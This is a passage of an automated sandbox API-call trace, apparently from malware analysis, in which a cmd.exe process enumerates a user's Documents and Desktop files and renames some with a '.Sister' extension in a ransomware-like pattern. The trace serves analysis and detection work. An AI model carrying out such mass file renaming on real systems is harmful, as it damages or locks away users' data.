"c:\\users\\fd1hvy\\documents\\qyvpupq5vyp.pps")) returned 0x20 [0305.511] ??_V@YAXPEAX@Z () returned 0x1 [0305.511] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.511] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.511] malloc (_Size=0xffce) returned 0x21eda2afca0 [0305.511] ??_V@YAXPEAX@Z () returned 0x21eda2afca0 [0305.512] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps" (normalized: "c:\\users\\fd1hvy\\documents\\qyvpupq5vyp.pps")) returned 0x20 [0305.512] malloc (_Size=0xffce) returned 0x21ed993f900 [0305.512] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.512] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps", fInfoLevelId=0x1, lpFindFileData=0x21ed93726f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed93726f0) returned 0x21ed8cc70c0 [0305.512] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0305.512] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0305.512] ??_V@YAXPEAX@Z () returned 0x1 [0305.512] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps" (normalized: "c:\\users\\fd1hvy\\documents\\qyvpupq5vyp.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\QyVPUpq5VyP.pps.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\qyvpupq5vyp.pps.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0305.513] FindNextFileW (in: hFindFile=0x21ed8cc70c0, lpFindFileData=0x21ed93726f0 | out: lpFindFileData=0x21ed93726f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f368100, ftCreationTime.dwHighDateTime=0x1d5e58b, ftLastAccessTime.dwLowDateTime=0x9c5771a0, ftLastAccessTime.dwHighDateTime=0x1d5ece5, ftLastWriteTime.dwLowDateTime=0x9c5771a0, ftLastWriteTime.dwHighDateTime=0x1d5ece5, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="QyVPUpq5VyP.pps", cAlternateFileName="")) returned 0 [0305.515] GetLastError () returned 0x12 [0305.515] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.515] ??_V@YAXPEAX@Z () returned 0x1 [0305.515] ??_V@YAXPEAX@Z () returned 0x1 [0305.515] ??_V@YAXPEAX@Z () returned 0x1 [0305.515] ??_V@YAXPEAX@Z () returned 0x1 [0305.515] GetProcessHeap () returned 0x21ed8c70000 [0305.515] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc73c0 [0305.515] GetProcessHeap () returned 0x21ed8c70000 [0305.515] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95980, Size=0x16) returned 0x21ed8c956c0 [0305.515] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c956c0) returned 0x16 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45e00, Size=0x20) returned 0x21ed8d45bf0 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45bf0) returned 0x20 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d61be0 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d61be0, Size=0xb2) returned 0x21ed93b64b0 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.516] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b64b0) returned 0xb2 [0305.516] GetProcessHeap () returned 0x21ed8c70000 [0305.517] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed93745c0 [0305.517] GetProcessHeap () returned 0x21ed8c70000 [0305.517] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93745c0, Size=0x30) returned 0x21ed93745c0 [0305.517] GetProcessHeap () returned 0x21ed8c70000 [0305.517] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93745c0) returned 0x30 [0305.517] GetProcessHeap () returned 0x21ed8c70000 [0305.517] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9374600 [0305.517] malloc (_Size=0x1ff9c) returned 0x21eda29fcc0 [0305.518] GetProcessHeap () returned 0x21ed8c70000 [0305.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b5670 [0305.518] GetProcessHeap () returned 0x21ed8c70000 [0305.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b67b0 [0305.518] ??_V@YAXPEAX@Z () returned 0x1 [0305.518] malloc (_Size=0x1ff9c) returned 0x21eda29fcc0 [0305.518] GetProcessHeap () returned 0x21ed8c70000 [0305.518] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b6930 [0305.518] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda29fcc0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0305.518] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7720 [0305.518] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7f00 [0305.519] FindClose (in: hFindFile=0x21ed8cc7f00 | out: hFindFile=0x21ed8cc7f00) returned 1 [0305.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc70c0 [0305.519] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.519] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1bf8, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0305.520] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.520] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0305.520] GetProcessHeap () returned 0x21ed8c70000 [0305.520] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d676b0 [0305.520] ??_V@YAXPEAX@Z () returned 0x1 [0305.520] ??_V@YAXPEAX@Z () returned 0x1 [0305.520] GetProcessHeap () returned 0x21ed8c70000 [0305.520] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9374600, Size=0x490) returned 0x21ed9374600 [0305.520] GetProcessHeap () returned 0x21ed8c70000 [0305.520] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9374600) returned 0x490 [0305.520] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0305.520] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.520] GetFileType (hFile=0x50) returned 0x2 [0305.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.520] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0305.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.521] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0305.528] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.528] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.528] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0305.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.528] GetFileType (hFile=0x50) returned 0x2 [0305.528] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.528] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0305.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.529] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0305.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.530] GetFileType (hFile=0x50) returned 0x2 [0305.530] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.530] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.530] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed93745d0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed93745d0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0305.531] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0305.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.531] GetFileType (hFile=0x50) returned 0x2 [0305.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.531] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0305.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.532] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0305.537] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0305.537] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.537] GetFileType (hFile=0x50) returned 0x2 [0305.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.537] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0305.538] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.538] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0305.545] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0305.546] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0305.546] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0305.546] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.546] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.546] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0305.546] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0305.546] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0305.546] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0305.546] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0305.546] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0305.546] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0305.546] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0305.546] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0305.546] ??_V@YAXPEAX@Z () returned 0x1 [0305.546] GetProcessHeap () returned 0x21ed8c70000 [0305.546] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5e420 [0305.547] GetProcessHeap () returned 0x21ed8c70000 [0305.547] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5e420, Size=0x130) returned 0x21ed8d2e0d0 [0305.547] GetProcessHeap () returned 0x21ed8c70000 [0305.547] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2e0d0) returned 0x130 [0305.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.547] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.547] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.547] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0305.547] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda29fcc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0305.549] ??_V@YAXPEAX@Z () returned 0x1 [0305.549] GetProcessHeap () returned 0x21ed8c70000 [0305.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d2de50 [0305.549] GetProcessHeap () returned 0x21ed8c70000 [0305.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f000 [0305.549] GetProcessHeap () returned 0x21ed8c70000 [0305.549] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f000, Size=0x130) returned 0x21ed8d2c690 [0305.549] GetProcessHeap () returned 0x21ed8c70000 [0305.549] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2c690) returned 0x130 [0305.549] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.549] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.549] GetProcessHeap () returned 0x21ed8c70000 [0305.549] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7f00 [0305.550] GetProcessHeap () returned 0x21ed8c70000 [0305.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93704c0 [0305.550] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.550] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.550] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.550] GetLastError () returned 0x2 [0305.550] GetProcessHeap () returned 0x21ed8c70000 [0305.550] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93c6ba0 [0305.550] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed93c6bb0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.550] SetErrorMode (uMode=0x0) returned 0x0 [0305.550] SetErrorMode (uMode=0x1) returned 0x0 [0305.550] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda29fcc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0305.550] SetErrorMode (uMode=0x0) returned 0x1 [0305.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0305.551] GetProcessHeap () returned 0x21ed8c70000 [0305.551] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9372470 [0305.551] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0305.551] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0305.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.551] GetLastError () returned 0x2 [0305.551] ??_V@YAXPEAX@Z () returned 0x1 [0305.551] malloc (_Size=0xffce) returned 0x21eda29fcc0 [0305.551] ??_V@YAXPEAX@Z () returned 0x21eda29fcc0 [0305.551] malloc (_Size=0xffce) returned 0x21eda2afca0 [0305.551] ??_V@YAXPEAX@Z () returned 0x21eda2afca0 [0305.551] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0305.551] GetLastError () returned 0x2 [0305.551] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.551] GetFileType (hFile=0x54) returned 0x2 [0305.552] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0305.552] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0305.552] _get_osfhandle (_FileHandle=2) returned 0x54 [0305.552] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0305.553] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.553] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0305.553] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.564] longjmp () [0305.564] ??_V@YAXPEAX@Z () returned 0x1 [0305.564] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x310d7e00, ftCreationTime.dwHighDateTime=0x1d5e4e1, ftLastAccessTime.dwLowDateTime=0x98b33c90, ftLastAccessTime.dwHighDateTime=0x1d5e1d3, ftLastWriteTime.dwLowDateTime=0x98b33c90, ftLastWriteTime.dwHighDateTime=0x1d5e1d3, nFileSizeHigh=0x0, nFileSizeLow=0x97ea, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="R-mSBlQLI7.ppt", cAlternateFileName="")) returned 1 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x214) returned 0x21ed8c758a0 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x214 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34990 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34990, Size=0x30) returned 0x21ed8d34990 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34990) returned 0x30 [0305.564] GetProcessHeap () returned 0x21ed8c70000 [0305.564] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d349d0 [0305.565] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.565] GetProcessHeap () returned 0x21ed8c70000 [0305.565] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8c50 [0305.566] ??_V@YAXPEAX@Z () returned 0x1 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d349d0, Size=0x160) returned 0x21ed8d349d0 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d349d0) returned 0x160 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34b40 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34b40, Size=0x290) returned 0x21ed8d34b40 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34b40) returned 0x290 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34de0 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d34de0, Size=0x30) returned 0x21ed8d34de0 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d34de0) returned 0x30 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d34e20 [0305.566] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.566] GetProcessHeap () returned 0x21ed8c70000 [0305.566] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8a10 [0305.567] ??_V@YAXPEAX@Z () returned 0x1 [0305.567] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.567] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc70c0 [0305.567] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.567] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc70c0 [0305.567] FindClose (in: hFindFile=0x21ed8cc70c0 | out: hFindFile=0x21ed8cc70c0) returned 1 [0305.568] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: 